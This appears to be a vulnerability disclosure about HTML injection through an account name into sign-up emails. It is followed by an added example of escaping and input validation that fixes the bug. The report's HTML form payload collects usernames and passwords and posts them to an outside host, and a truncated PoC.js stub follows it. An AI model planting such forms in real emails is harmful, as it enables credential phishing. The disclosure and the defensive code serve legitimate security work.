Hi, I found a way to inject HTML into a user's email. In this case, if an attacker sets the victim's name to an HTML form, it will be rendered by your system and the rendered HTML will then be sent to the victim.
```html
<form action="https://brutelogic.com.br/poc.svg/" method="post">
  <label for="username">Username:</label>
  <input class="userbox" type="text" name="username"/><br />
  <label for="password">Password:</label>
  <input type="text" name="password" >
  <input class="button" type="submit" value="submit" />
</form>
```
Enter the victim's email and create a new account.
Now go to the mail and check; you will see our code has been rendered as HTML.
Submit the form and XSS.
```
// PoC.js
var payload = …
```
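The fix for this class of bug is to escape the account name at the point where it is written into the HTML email body, with input validation at signup as a second layer. The following is an added example, not code from the report or the affected system; the email template, function names, placeholder URL and 64-character limit are assumptions.

```javascript
// Added example: hypothetical welcome-email renderer, not the affected system's code.

// Escape the five characters that let text break out into HTML markup or attributes.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the account name is concatenated into the HTML body as-is.
function renderWelcomeUnsafe(name) {
  return `<html><body><p>Hi ${name},</p><p>Welcome to your new account.</p></body></html>`;
}

// Hardened pattern: the name is treated as text and escaped at output time.
function renderWelcomeSafe(name) {
  return `<html><body><p>Hi ${escapeHtml(name)},</p><p>Welcome to your new account.</p></body></html>`;
}

// Defence in depth at signup: reject angle brackets and control characters and
// cap the length (64 is an assumed limit). Apostrophes stay legal ("O'Brien");
// output escaping is what makes them harmless.
function isAcceptableDisplayName(name) {
  return typeof name === 'string' &&
    name.length > 0 && name.length <= 64 &&
    !/[<>\u0000-\u001f]/.test(name);
}

// Constructed sample input modelled on the form in the report (placeholder URL).
const sampleName =
  '<form action="https://example.invalid/collect" method="post">' +
  '<input type="text" name="password"/></form>';

// Summarise how each renderer and the signup check treat the sample name.
function demo() {
  return {
    unsafeHasForm: renderWelcomeUnsafe(sampleName).includes('<form'),
    safeHasForm: renderWelcomeSafe(sampleName).includes('<form'),
    nameAccepted: isAcceptableDisplayName(sampleName),
  };
}

console.log(demo());
```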